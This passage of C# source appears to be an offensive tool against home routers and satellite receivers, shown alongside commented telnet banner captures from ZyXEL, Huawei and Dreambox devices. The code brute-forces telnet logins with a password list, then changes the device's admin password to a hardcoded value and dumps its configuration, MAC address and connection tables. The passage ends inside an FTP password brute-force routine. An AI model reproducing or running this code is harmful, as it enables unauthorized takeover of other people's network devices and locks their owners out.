2099. 9. Call Control
2100. 10. Time and Date Setting
2101. 11. Remote Management
2102.  
2103.  
2104.  
2105.  
2106.  
2107. Enter Menu Selection Number:
2108. */
2109. /*
2110. Enter Menu Selection Number: 8
2111.  
2112.  
2113. Copyright (c) 1994 - 2003 ZyXEL Communications Corp.
2114. ras> help
2115. Valid commands are:
2116. sys exit ether wan
2117. ip bridge
2118. ras>
2119. */
2120. /*
2121. Menu 24.11 - Remote Management Control
2122.  
2123. TELNET Server:
2124. Server Port = 23 Server Access = ALL
2125. Secured Client IP = 0.0.0.0
2126.  
2127. FTP Server:
2128. Server Port = 21 Server Access = ALL
2129. Secured Client IP = 0.0.0.0
2130.  
2131. Web Server:
2132. Server Port = 80 Server Access = ALL
2133. Secured Client IP = 0.0.0.0
2134.  
2135.  
2136.  
2137.  
2138.  
2139. Press ENTER to Confirm or ESC to Cancel:
2140. */
2141.  
2142.  
2143.  
2144.  
2145. //********************************************************
2146. //**************************
2147. //* *
2148. //* The Gemini Project *
2149. //* *
2150. //**************************
2151.  
2152. //welcome on your dreambox! - Kernel 2.6.9 (17:51:55).
2153.  
2154. //dreambox login: admin
2155. //Password:
2156. //Login incorrect
2157. //dreambox login:
2158. //
2159. //root/dreambox
2160.  
2161.  
2162. //********************************************************
2163. //***************************
2164. //* *
2165. //* The Gemini Project *
2166. //* *
2167. //***************************
2168. //* Prepared By "drhg" *
2169. //* ( Dream-Gaza Team ) *
2170. //* www.dreamgaza.com *
2171. //***************************
2172.  
2173. //Checking Kernel, Please Wait ....
2174.  
2175. //Kernel 2.6.9.
2176. //md5sum (dreambox Linux ppc ).
2177. //head.ko = 308509 bytes.
2178. //Safe, NO 'clone bomb' found ... Congratulations.
2179.  
2180. //Enjoy Original Gemini Project without Time Bomb !.
2181. //---------------------------------------------------
2182.  
2183. //(Friday, 17 September 2010).
2184. //welcome on your dreambox! - Kernel 2.6.9 (10:46:22).
2185.  
2186.  
2187. //dreambox login: bad
2188. //Password:
2189. //Login incorrect
2190. //dreambox login: root
2191. //Password:
2192. //Login incorrect
2193. //dreambox login: root
2194. //Password:
2195. //Login incorrect
2196.  
2197. //********************************************************
2198. //OpenDreambox 1.5.0 dm800
2199.  
2200. //dm800 login:
2201. //dm800 login: bad
2202. //Password:
2203. //Login incorrect
2204. //dm800 login: root
2205. //root@dm800:~#
2206. //CCcam_2011 head pyhtmlizer
2207. //StartNabCam hexdump python
2208. //\[ hostname rdjpgcom
2209. //addgroup hotplug readlink
2210. //adduser id reboot
2211. //ar ifconfig reboot.sysvinit
2212. //arping ifdown renice
2213. //ash ifup reset
2214. //automount im rjoe
2215. //avahi-daemon inadyn rm
2216. //awk inadyn_script.sh rmdir
2217. //basename inetd rmmod
2218. //bdpoll init route
2219. //bookify init.sysvinit rquotad
2220. //bunzip2 insmod run-parts
2221. //busybox ip runlevel
2222. //bzcat ipkg rx
2223. //cat ipkg-cl scp
2224. //cftp ipkg-link sed
2225. //chat iwconfig seq
2226. //chgrp iwgetid sfdisk
2227. //chmod iwlist sh
2228. //chown iwpriv sha1sum
2229. //chroot iwspy showiframe
2230. //chvt jmacs showmount
2231. //cjpeg joe shutdown
2232. //ckeygen jpegtran shutdown.sysvinit
2233. //clear jpico sleep
2234. //conch jstar smartctl
2235. //cp kill smartd
2236. //cpio killall smbd
2237. //crond killall5 sort
2238. //crontab klogd ssh
2239. //cut last start-stop-daemon
2240. //czap last.sysvinit statd
2241. //date lastb streamproxy
2242. //dbclient ldconfig strings
2243. //dbus-cleanup-sockets less stty
2244. //dbus-daemon lessecho su
2245. //dbus-launch lesskey sulogin
2246. //dbus-monitor ln swapoff
2247. //dbus-send loadfont swapon
2248. //dbus-uuidgen loadkmap sync
2249. //dc lockd sysctl
2250. //dccamd logger syslogd
2251. //dd login szap
2252. //deallocvt logname t-im
2253. //delgroup logread tail
2254. //deluser lore tap2deb
2255. //depmod losetup tap2rpm
2256. //depmod.26 ls tapconvert
2257. //df lsmod tar
2258. //dirname mailmail tda1002x
2259. //djpeg makedevs tee
2260. //dmesg manhole telinit
2261. //dos2unix map-mbone telnet
2262. //dropbear mc telnetd
2263. //dropbearconvert mcedit termidx
2264. //dropbearkey mcmfmt test
2265. //dropbearmulti mcview time
2266. //du md5sum tkconch
2267. //dumpkmap mesg top
2268. //dvbsnoop mesg.sysvinit touch
2269. //dvbtraffic mkdir tput
2270. //e2fsck mke2fs tr
2271. //echo mkfifo traceroute
2272. //egrep mkfs.ext2 trial
2273. //enigma2 mkfs.ext3 true
2274. //enigma2.sh mknod tset
2275. //env mkswap tty
2276. //ethtool mktap tuxtxt
2277. //exportfs mktemp twistd
2278. //expr modprobe tzap
2279. //false more udhcpc
2280. //fbset mount umount
2281. //fdisk mountd uname
2282. //fdisk.util-linux mountpoint uniq
2283. //femon mrinfo unix2dos
2284. //fgrep mrouted unzip
2285. //find mv update-alternatives
2286. //free nc update-inetd
2287. //fsck.ext2 netstat update-modules
2288. //fsck.ext3 nfs_server_script.sh update-passwd
2289. //ftpget nfsd update-rc.d
2290. //ftpput nfsstat uptime
2291. //getepgchannels nhfsgraph utmpdump
2292. //getkey nhfsnums uudecode
2293. //getty nhfsrun uuencode
2294. //grab nhfsstone vi
2295. //grep nmbd vlock
2296. //gst-feedback nslookup vsftpd
2297. //gst-feedback-0.10 od wall
2298. //gst-inspect openvpn wall.sysvinit
2299. //gst-inspect-0.10 openvpn_script.sh watch
2300. //gst-launch openvt wc
2301. //gst-launch-0.10 passwd wdog
2302. //gst-typefind patch wget
2303. //gst-typefind-0.10 pidof which
2304. //gst-visualise-0.10 pidof.sysvinit who
2305. //gst-xmlinspect ping whoami
2306. //gst-xmlinspect-0.10 pivot_root wpa_cli
2307. //gst-xmllaunch poff wpa_passphrase
2308. //gst-xmllaunch-0.10 pon wpa_supplicant
2309. //gunzip portmap wrjpgcom
2310. //gzip poweroff xargs
2311. //halt pppd yes
2312. //halt.sysvinit printf zcat
2313. //hddtemp ps zeroconf
2314. //hdparm pwd
2315. //root@dm800:~#
2316. //root@dm800:~# passwd
2317. //Changing password for root
2318. //Enter the new password (minimum of 5, maximum of 8 characters)
2319. //Please use a combination of upper and lower case letters and numbers.
2320. //Enter new password:
2321. //Re-enter new password:
2322. //Password changed.
2323. //root@dm800:~#
2324.  
2325.  
2326. //********************************************************
2327. //BusyBox on (none) login: bad
2328. //Password:
2329. //Login incorrect
2330.  
2331. //BusyBox on (none) login: admin
2332. //Password:
2333.  
2334.  
2335. //BusyBox v0.61.pre (2008.01.25-06:33+0000) Built-in shell (ash)
2336. //Enter 'help' for a list of built-in commands.
2337.  
2338. //# help
2339.  
2340. //Built-in commands:
2341. //-------------------
2342. // . : bg break builtin cd chdir continue eval exec exit export
2343. // false fc fg hash help jobs kill local pwd read readonly return
2344. // set setvar shift times trap true type ulimit umask unset wait
2345.  
2346.  
2347. //********************************************************
2348. //User Access Verification
2349. //
2350. //Password:
2351. //Password:
2352. //Password:
2353. //% Bad passwords
2354.  
2355.  
2356. //********************************************************
2357. //Huawei Home Gateway 550
2358. //wl driver adapter not found
2359. //wl driver adapter not found
2360. //wl driver adapter not found
2361. //wl driver adapter not found
2362. //wl driver adapter not found
2363. //wl driver adapter not found
2364. //wl driver adapter not found
2365. //wl driver adapter not found
2366. //Login: bad
2367. //Password:
2368. //Login incorrect. Try again.
2369. //Login: admin
2370. //Password:
2371. //Login incorrect. Try again.
2372. //Login: admin
2373. //Password:
2374. //Authorization failed after trying 3 times!!!.
2375. //wl driver adapter not found
2376. //wl driver adapter not found
2377. //wl driver adapter not found
2378. //wl driver adapter not found
2379. //wl driver adapter not found
2380. //wl driver adapter not found
2381. //wl driver adapter not found
2382. //wl driver adapter not found
2383. //Login:
2384.  
2385. #endregion
2386.  
2387. foreach (string password in passwords)
2388. {
2389. Thread.Sleep(100);
2390. try
2391. {
2392. Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
2393. Sock_scan.Connect(ip);
2394.  
2395.  
2396. recv = Sock_scan.Receive(data);
2397. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2398. // Console.WriteLine("{0} -> Banner telnet: " + stringdata, myip);
2399.  
2400. //Console.WriteLine("DEBUG Trying Password:{0}", password);
2401. //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password + Convert.ToChar(13) + Convert.ToChar(10)));
2402. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password+"\r"),SocketFlags.None);
2403. /*
2404. Byte[] smk = new Byte[password.Length];
2405. for (int i = 0; i < password.Length; i++)
2406. {
2407. Byte ss = Convert.ToByte(password[i]);
2408. smk[i] = ss;
2409. }
2410. Sock_scan.Send(smk, 0, smk.Length, SocketFlags.None);
2411. */
2412.  
2413. //Thread.Sleep(100);
2414.  
2415. recv = Sock_scan.Receive(data);
2416. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2417. //Console.WriteLine("{0} -> Response telnet: " + stringdata, myip);
2418. recv = Sock_scan.Receive(data);
2419. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2420. Console.WriteLine("{0} -> Response telnet02: " + stringdata, myip);
2421. if (stringdata == "")
2422. {
2423. recv = Sock_scan.Receive(data);
2424. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2425. Console.WriteLine("{0} -> Response telnet02b: " + stringdata, myip);
2426. }
2427.  
2428. //stringdata = null;
2429. //bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
2430. //stringdata = stringdata + ASCII.GetString(RecvBytes, 0, bytes);
2431. //Console.WriteLine("Response telnet: " + strRetPage);
2432. //while (bytes > 0)
2433. //{
2434. // bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
2435. // stringdata = stringdata + ASCII.GetString(RecvBytes, 0, bytes);
2436. // Console.WriteLine("Response telnet: " + strRetPage);
2437. //}
2438.  
2439.  
2440.  
2441. //Bad Password!!!
2442. if (stringdata.Contains("assword:") || stringdata.Contains("Bad Password")) //stringdata.Contains("*")
2443. {
2444. // Console.WriteLine("{0} -> bad telnet password: {1}\n", myip, password);
2445. Sock_scan.Close();
2446. }
2447. else
2448. {
2449. Console.WriteLine("***********************************************************");
2450. Console.WriteLine("{0} -> TELNET PASSWORD FOUND: {1}\n", myip, password);
2451. Console.WriteLine("***********************************************************");
2452.  
2453. if(stringdata.Contains("ZyXEL")) //1234
2454. {
2455. if (stringdata.Contains("Menu")) //1234
2456. {
2457. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("23" + "\r"), SocketFlags.None);
2458. recv = Sock_scan.Receive(data);
2459. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2460. Console.WriteLine("{0} -> " + stringdata, myip);
2461.  
2462. // Menu 23 - System Password
2463. //Old Password= ?
2464. //New Password= ?
2465. //Retype to confirm= ?
2466.  
2467. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password + "\r"), SocketFlags.None);
2468. recv = Sock_scan.Receive(data);
2469. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2470. Console.WriteLine("{0} -> " + stringdata, myip);
2471.  
2472. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
2473. recv = Sock_scan.Receive(data);
2474. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2475. Console.WriteLine("{0} -> " + stringdata, myip);
2476.  
2477. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
2478. recv = Sock_scan.Receive(data);
2479. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2480. Console.WriteLine("{0} -> " + stringdata, myip);
2481.  
2482. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("\r"), SocketFlags.None);
2483. recv = Sock_scan.Receive(data);
2484. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2485. Console.WriteLine("{0} -> " + stringdata, myip);
2486.  
2487. //(Saving to ROM...)
2488. //Retour menu
2489. }
2490. else
2491. {
2492. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("sys adminPassword j3R0m3!!" + "\r"), SocketFlags.None);
2493. recv = Sock_scan.Receive(data);
2494. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2495. Console.WriteLine("{0} -> " + stringdata, myip);
2496. }
2497. }
2498. else
2499. {
2500. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("sys password j3R0m3!!" + "\r"), SocketFlags.None);
2501. recv = Sock_scan.Receive(data);
2502. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2503. Console.WriteLine("{0} -> " + stringdata, myip);
2504. //save ok, new password is: j3R0m3!!.
2505.  
2506. ////Exemple: Vulcan
2507. ////Erreur: Commande Invalide
2508. ////$passwd
2509. //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("passwd" + "\r"), SocketFlags.None);
2510. ////Enter Old Password:
2511. //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" + "\r"), SocketFlags.None);
2512. ////Enter New Password:
2513. //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
2514. ////Confirm New Password:
2515. //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
2516. ////Set Done
2517. ////SINON: Erreur: Combinaison nom dÆutilisateur/mot de passe invalide
2518. }
2519.  
2520. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("show all" + "\r"), SocketFlags.None);
2521. recv = Sock_scan.Receive(data);
2522. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2523. Console.WriteLine("{0} -> " + stringdata, myip);
2524. recv = Sock_scan.Receive(data);
2525. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2526. Console.WriteLine("{0} -> " + stringdata, myip);
2527. recv = Sock_scan.Receive(data);
2528. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2529. Console.WriteLine("{0} -> " + stringdata, myip);
2530. recv = Sock_scan.Receive(data);
2531. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2532. Console.WriteLine("{0} -> " + stringdata, myip);
2533. recv = Sock_scan.Receive(data);
2534. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2535. Console.WriteLine("{0} -> " + stringdata, myip);
2536.  
2537.  
2538. //***************
2539. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("sys atsh" + "\r"), SocketFlags.None); //for MAC address
2540. recv = Sock_scan.Receive(data);
2541. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2542. Console.WriteLine("{0} -> " + stringdata, myip);
2543. recv = Sock_scan.Receive(data);
2544. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2545. Console.WriteLine("{0} -> " + stringdata, myip);
2546. recv = Sock_scan.Receive(data);
2547. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2548. Console.WriteLine("{0} -> " + stringdata, myip);
2549. recv = Sock_scan.Receive(data);
2550. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2551. Console.WriteLine("{0} -> " + stringdata, myip);
2552. recv = Sock_scan.Receive(data);
2553. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2554. Console.WriteLine("{0} -> " + stringdata, myip);
2555.  
2556.  
2557. /*
2558. D-Link DSL 526B >restoredefault
2559. Huawei SmartAX MT882a >sys romreset
2560. TP-Link TD-8817 >sys romreset
2561. */
2562.  
2563. //***************
2564. //For MT882A
2565. /*
2566. MT882a> ether config
2567. --------------- NDIS CONFIGURATION BLOCK ----------------
2568. type=1 flags=0001
2569. Board/Chassis:1 Lines/Board:1 Channels/Lines:2 Total Channel:2
2570. task-id=8041f1f4 event-q=80458c2c(19) data-q=80458c70(1a) func-id=2
2571. board-cfg=8042c8a4 line-cfg=8042c8bc chann-cfg=8042c8d0
2572. board-pp (8042c8f0)
2573. 804273fc
2574. line-pp (8042c8f4)
2575. 8042956c
2576. chann-pp (8042c8f8)
2577. 804bf8a4 804bfe34
2578. --------------- BOARD DISPLAY ---------------------------
2579. ID slot# n-line n-chann status line-cfg chann-cfg
2580. 00 0 1 2 0001 8042c8bc 8042c8d0
2581. --------------- LINE DISPLAY ---------------------------
2582. ID line# board-id n-chann chann-cfg
2583. 00 1 00 2 8042c8d0
2584. --------------- CHANNEL DISPLAY -------------------------
2585. ID chan# line-id board-id address name
2586. 00 1 00 00 804bf8a4 enet0
2587. 01 2 00 00 804bfe34 enet1
2588. */
2589. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("ether config" + "\r"), SocketFlags.None);
2590. recv = Sock_scan.Receive(data);
2591. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2592. Console.WriteLine("{0} -> " + stringdata, myip);
2593. recv = Sock_scan.Receive(data);
2594. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2595. Console.WriteLine("{0} -> " + stringdata, myip);
2596. recv = Sock_scan.Receive(data);
2597. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2598. Console.WriteLine("{0} -> " + stringdata, myip);
2599. recv = Sock_scan.Receive(data);
2600. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2601. Console.WriteLine("{0} -> " + stringdata, myip);
2602. recv = Sock_scan.Receive(data);
2603. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2604. Console.WriteLine("{0} -> " + stringdata, myip);
2605.  
2606.  
2607. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("ip tcp status" + "\r"), SocketFlags.None);
2608. recv = Sock_scan.Receive(data);
2609. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2610. Console.WriteLine("{0} -> " + stringdata, myip);
2611. recv = Sock_scan.Receive(data);
2612. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2613. Console.WriteLine("{0} -> " + stringdata, myip);
2614. recv = Sock_scan.Receive(data);
2615. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2616. Console.WriteLine("{0} -> " + stringdata, myip);
2617. recv = Sock_scan.Receive(data);
2618. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2619. Console.WriteLine("{0} -> " + stringdata, myip);
2620. recv = Sock_scan.Receive(data);
2621. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2622. Console.WriteLine("{0} -> " + stringdata, myip);
2623.  
2624. /*
2625. MT882a> ip tcp status
2626. ( 1)tcpRtoAlgorithm 4 ( 2)tcpRtoMin 0
2627. ( 3)tcpRtoMax 4294967295 ( 4)tcpMaxConn 16
2628. ( 5)tcpActiveOpens 0 ( 6)tcpPassiveOpens 477
2629. ( 7)tcpAttemptFails 42 ( 8)tcpEstabResets 22
2630. ( 9)tcpCurrEstab 1 (10)tcpInSegs 9765
2631. (11)tcpOutSegs 2549 (12)tcpRetransSegs 389
2632. (14)tcpInErrs 2 (15)tcpOutRsts 93
2633. tcbsInUseCnt = 4
2634. &TCB Rcv-Q Snd-Q Local socket Remote socket State
2635. 804fdce4 0 621 41.248.40.35:23 196.12.232.120:61565 Estab 0
2636. 804fd66c 0 0 0.0.0.0:21 0.0.0.0:0 Listen 0
2637. 804fd558 0 0 0.0.0.0:7547 0.0.0.0:0 Listen (S) 0
2638. 804fd444 0 0 0.0.0.0:80 0.0.0.0:0 Listen (S) 0
2639. */
2640.  
2641. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("ip udp status" + "\r"), SocketFlags.None);
2642. recv = Sock_scan.Receive(data);
2643. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2644. Console.WriteLine("{0} -> " + stringdata, myip);
2645. recv = Sock_scan.Receive(data);
2646. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2647. Console.WriteLine("{0} -> " + stringdata, myip);
2648. recv = Sock_scan.Receive(data);
2649. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2650. Console.WriteLine("{0} -> " + stringdata, myip);
2651. recv = Sock_scan.Receive(data);
2652. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2653. Console.WriteLine("{0} -> " + stringdata, myip);
2654. recv = Sock_scan.Receive(data);
2655. stringdata = Encoding.ASCII.GetString(data, 0, recv);
2656. Console.WriteLine("{0} -> " + stringdata, myip);
2657.  
2658.  
2659.  
2660. //ATTACK
2661. /*
2662. MT882a> ip ping
2663. Usage: ping <hostid>
2664. MT882a> ip ping www.google.com
2665. Resolving www.google.com... 173.194.67.105
2666. sent rcvd rate rtt avg mdev max min
2667. 1 1 100 80 80 0 80 80
2668. 2 2 100 80 80 0 80 80
2669. 3 3 100 80 80 0 80 80
2670. */
2671.  
2672. /*
2673. MT882a> ip route
2674. status add addiface addprivate
2675. addrom drop
2676. MT882a> ip route status
2677. Dest FF Len Device Gateway Metric stat Timer Use RN
2678. 41.248.40.1 00 32 poe0 41.248.40.1 1 0329 0 0 ISP-0
2679. 192.168.1.0 00 24 enet0 192.168.1.1 1 041b 0 0
2680. default 00 0 poe0 ISP-0 2 00ab 0 3245 ISP-0
2681. */
2682.  
2683. /*
2684. MT882a> ether driver
2685. cnt status config ackdrop
2686. macnum ackmode etherppp wan2lan
2687. MT882a> ether driver cnt
2688. disp
2689. MT882a> ether driver cnt disp
2690. Usage: disp <name>
2691. MT882a> ether driver status
2692. Usage: driver status <ch-name>
2693. MT882a> ether driver config
2694. Usage: driver config [0|1=auto|normal] [0|1=10|100] [0|1=HD|FD] <ch-name>
2695. MT882a> ether driver ackdrop
2696. current ack drop number is 0
2697. ack drop cnt=0
2698. Usage: ackdrop <number>
2699. MT882a> ether driver macnum
2700. Please input allowed mac number(0~255), 0 means no limitation
2701. Current allowed mac number: 0
2702. MT882a> ether driver ackmode
2703. TCP ACK mode: off
2704. ACK length: 90
2705. TCP ACK mode type: Task
2706. MT882a> ether driver etherppp
2707. PPP check : on
2708.  
2709. MT882a> ether driver wan2lan
2710. Usage: wan2lan [on||off] <number>
2711. Current wan2lan feature status: off
2712. */
2713.  
2714.  
2715.  
2716. /*
2717. MT882a> wan
2718. atm node hwsar adsl
2719. tsarm
2720. MT882a> wan atm
2721. test mpoasendloop oam vcpool
2722. MT882a> wan atm test
2723. Usage: test [fix|rand|period|oam|loopback]
2724. MT882a> wan node
2725. index display clear save
2726. ispname enable disable encap
2727. mux vpi vci qos
2728. pcr scr mbs cdvt
2729. wanip remoteip bridge routeip
2730. nat rip multicast callsch
2731. service nailedup filter ppp
2732. mtu default_r
2733. MT882a> wan node display
2734. WAN node index = 1
2735. Active = no
2736. Route IP = off
2737. Bridge = off
2738. Name =
2739. Encapsulcation <2:PPPoE|3:RFC1483|4:PPPoA|5:Enet Encap> = 0
2740. Mux <1:LLC|2:VC> = 0
2741. VPI/VCI = 0 / 0
2742. PPPoE service name =
2743. PPP username =
2744. PPP password =
2745. PPP authentication <1:PAP|2:CHAP|3:BOTH> = 0
2746. SUA/NAT is disabled
2747. Static IP address
2748. WAN IP address = 0.0.0.0
2749. Remote IP address = 0.0.0.0
2750. Remote IP subnet mask = 0.0.0.0
2751. Idle timeout = 0
2752. Call scheduling set = 1 1 1 1
2753. Nailed-up connection = off
2754. QOS Type <2:CBR|3:UBR|4:rtVBR|5:nrtVBR|6:GFR> = 0
2755. QOS PCR/SCR/MBS/CDVT = 0, 0, 0, 0
2756. RIP direction <0:none|1:both|2:in|3:out>= 0
2757. RIP version <0:RIP-1|1:RIP-2B|2:RIP-2M> = 0
2758. Multicast <0:IGMP-v2|1:IGMP-v1|2:none> = 0
2759. Incoming protocol filter set = 1 1 1 1
2760. Incoming device filter set = 1 1 1 1
2761. Outgoing protocol filter set = 1 1 1 1
2762. Outgoing device filter set = 1 1 1 1
2763. MT882a> wan node wanip
2764. Usage: wan node wanip <static> <ip address>
2765. or: wan node wanip <dynamic>
2766. errcode = -4
2767. */
2768.  
2769.  
2770.  
2771. /*
2772. MT882a> wan adsl
2773. chandata close coding defbitmap
2774. linedata open opencmd opmode
2775. perfdata reset status version
2776. vendorid utopia nearituid farituid
2777. cellcnt display rateadap dumpcondition
2778. sampletime noisegt noisemargin persisttime
2779. timeinterval defectcheck txgain targetnoise
2780. txfilter setrvid txtones snroffset
2781. errorsecond diag watchdog fwversion
2782. uptime dumprate annex
2783. MT882a> wan adsl display
2784. shutdown rateup
2785. MT882a> wan adsl fwversion
2786. DMT FwVer: 3.11.2.151_A_TC3086 HwVer: T14F7_5.0
2787.  
2788. MT882a> wan adsl utopia
2789. UTOPIA parameters:
2790. level: 1
2791. fast address: 0
2792. interleaved address: 1
2793. MT882a> wan adsl coding
2794. line coding: DMT
2795. MT882a> wan adsl txtones
2796. usage: <start tone> <end tone> tone=0x6~0x1F
2797. current value: start_tone=6 end_tone=1f
2798. MT882a> wan adsl opmode
2799. operational mode: ITU G.992.5(ADSL2PLUS)
2800.  
2801. MT882a> wan adsl uptime
2802. ADSL uptime 122:15:16
2803. MT882a> wan adsl sampletime
2804. Usage: min
2805. MT882a> wan adsl linedata
2806. far near
2807. MT882a> wan adsl linedata near
2808. relative capacity occupation: 100%
2809. noise margin downstream: 37.0 db
2810. output power upstream: 11.3 dbm
2811. attenuation downstream: 13.7 db
2812. MT882a> wan adsl linedata far
2813. relative capacity occupation: 100%
2814. noise margin upstream: 34.5 db
2815. output power downstream: 19.3 dbm
2816. attenuation upstream: 9.6 db
2817. carrier load: number of bits per symbol(tone)
2818. tone 0- 31: 00 00 00 00 02 25 56 66 66 66 66 66 55 44 43 20
2819. tone 32- 63: 00 00 00 00 00 00 00 00 00 00 04 34 45 55 54 55
2820. tone 64- 95: 10 44 53 65 53 05 05 56 66 65 53 65 36 65 66 54
2821. tone 96-127: 55 65 55 45 55 54 45 45 14 55 41 55 45 55 45 51
2822. tone 128-159: 54 45 54 55 44 55 55 55 55 45 65 45 45 46 54 56
2823. tone 160-191: 54 55 45 50 04 00 45 05 05 44 54 54 55 35 40 54
2824. tone 192-223: 55 55 50 45 05 00 55 00 40 00 00 00 00 00 00 00
2825. tone 224-255: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
2826. tone 256-287: 00 00 50 00 00 00 50 00 00 40 00 40 00 00 00 00
2827. tone 288-319: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
2828. tone 320-351: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
2829. tone 352-383: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
2830. tone 384-415: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
2831. tone 416-447: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
2832. tone 448-479: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
2833. tone 480-511: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
2834.  
2835. MT882a> dot1q disp
2836. 802.1Q Tagged-based VLAN: Inactive(1)
2837.  
2838. Port | PVID || Port | PVID || Port | PVID || Port | PVID ||
2839. ------+--------++------+--------++------+--------++------+--------++
2840. e1 | 1 ||
2841. p0 | 1 || p1 | 1 || p2 | 1 || p3 | 1 ||
2842. p4 | 1 || p5 | 1 || p6 | 1 || p7 | 1 ||
2843. u | 1 ||
2844. cpu | 15 ||
2845.  
2846. No|Act| VID| Name | Egress Port
2847. --+---+----+-----------+------------------------------------------
2848. | Tagged Egress Port
2849. +------------------------------------------
2850. 0| N | 0| |
2851. |
2852. 1| N | 0| |
2853. |
2854. 2| N | 0| |
2855. |
2856. 3| N | 0| |
2857. |
2858. 4| N | 0| |
2859. |
2860. 5| N | 0| |
2861. |
2862. 6| N | 0| |
2863. |
2864. 7| N | 0| |
2865. |
2866. 8| N | 0| |
2867. |
2868. 9| N | 0| |
2869. |
2870. 10| N | 0| |
2871. |
2872. 11| N | 0| |
2873. |
2874. 12| N | 0| |
2875. |
2876. 13| N | 0| |
2877. |
2878. 14| Y | 1| vlan14|e1,u,p0,p1,p2,p3,p4,p5,p6,p7
2879. |
2880. 15| Y | 15| vlan15|e1,u
2881. |
2882. */
2883.  
2884.  
2885.  
2886.  
2887.  
2888.  
2889. Sock_scan.Close();
2890. break;
2891. }
2892. }
2893. catch (Exception e)
2894. {
2895. Console.WriteLine("DEBUG EXCEPTION02: {0} -> " + e.Message, myip);
2896. }
2897. }
2898. }
2899. else
2900. {
2901. Console.WriteLine("{0} DEBUG no telnet Password: "+banner,myip);
2902. }
2903.  
2904. // Sock_scan.Close();
2905. }
2906.  
2907. public static void ftptry(string myip)
2908. {
2909. Console.WriteLine("ftptry");
2910.  
2911. byte[] data = new byte[1024];
2912. string stringdata;
2913. int recv;
2914.  
2915. IPAddress adresseIP = IPAddress.Parse(myip);
2916. IPEndPoint ip = new IPEndPoint(adresseIP, 21);
2917. Socket Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
2918. Sock_scan.Connect(ip);
2919.  
2920. recv = Sock_scan.Receive(data);
2921. Console.WriteLine("Banner ftp: " + Encoding.ASCII.GetString(data, 0, recv));
2922.  
2923. foreach (string password in passwords)
2924. {
2925. try
2926. {
2927. Console.WriteLine("{0} -> USER", myip);
2928. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("USER" + Convert.ToChar(32) + "admin" + Convert.ToChar(13) + Convert.ToChar(10)));
2929. recv = Sock_scan.Receive(data);
2930. Console.WriteLine("{0} -> Response ftp: " + Encoding.ASCII.GetString(data, 0, recv), myip);
2931. //331 Please specify the password.
2932. //331 Enter PASS command
2933. //331 User name okay, need password.
2934.  
2935. Console.WriteLine("{0} -> PASS", myip);
2936. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("PASS" + Convert.ToChar(32) + password + Convert.ToChar(13) + Convert.ToChar(10)));
2937. recv = Sock_scan.Receive(data);
2938. stringdata = Encoding.ASCII.GetString(data, 0, recv);
